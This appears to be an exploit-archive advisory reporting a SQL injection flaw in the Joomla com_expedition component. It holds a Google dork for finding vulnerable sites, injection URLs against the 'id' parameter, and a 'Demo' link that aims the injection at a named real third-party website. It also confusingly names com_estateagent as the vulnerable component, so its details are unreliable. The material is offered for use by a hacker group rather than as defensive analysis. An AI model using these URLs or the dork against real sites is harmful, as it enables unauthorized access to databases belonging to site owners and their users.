Joomla Component (com_expedition) <= SQL Injection Vulnerability

2011.10.12
Credit: BHG Security Center
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: inurl:index.php?option=com_expedition

#### # Exploit Title: Joomla Component (com_expedition) <= SQL Injection Vulnerability # Author: BHG Security Center # Date: 2011-10-10 # Vendor: N/A # E-mail: Net.Edit0r@att.net | black.hat.tm@gmail.com # Website: www.black-hg.org # Google Dork: inurl:index.php?option=com_expedition # Category:: Webapps # Tested on: [Windows Vista Edition Intgral- French] # http://demo15.joomlaapps.com/ #### [*] ExpLo!T : http://127.0.0.1/index.php?option=com_expedition&task=detail&id=-3235' http://127.0.0.1/index.php?option=com_expedition&task=detail&id=[SQLi] http://127.0.0.1/path/index.php?option=com_expedition&task=detail&id=[SQLi] [*] Demo : http://www.astrobio.net/index.php?option=com_expedition&task=detail&id=-3235 #### [+] Peace From Algeria Vunl Component : com_estateagent Error in file joomla Component (com_estateagent) Sql Injection A vulnerable parameter $ detail&id= #### =================================**BHG Security Center**=====================================| # Greets To : | | Net.Edit0r ~ A.Cr0x ~ 3H34N ~ 4m!n ~ Cyrus ~ tHe.k!ll3r ~ Mr.XHat ~ ArYaIeIrAn ~ Mikili | cmaxx M4hd1 ~ Cru3l.b0y ~ HUrr!c4nE ~ r3v0lter , NoL1m1t , farbodmahini ~ xb0y | THANKS TO ALL Iranian HackerZ | | ============================================================================================ |


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top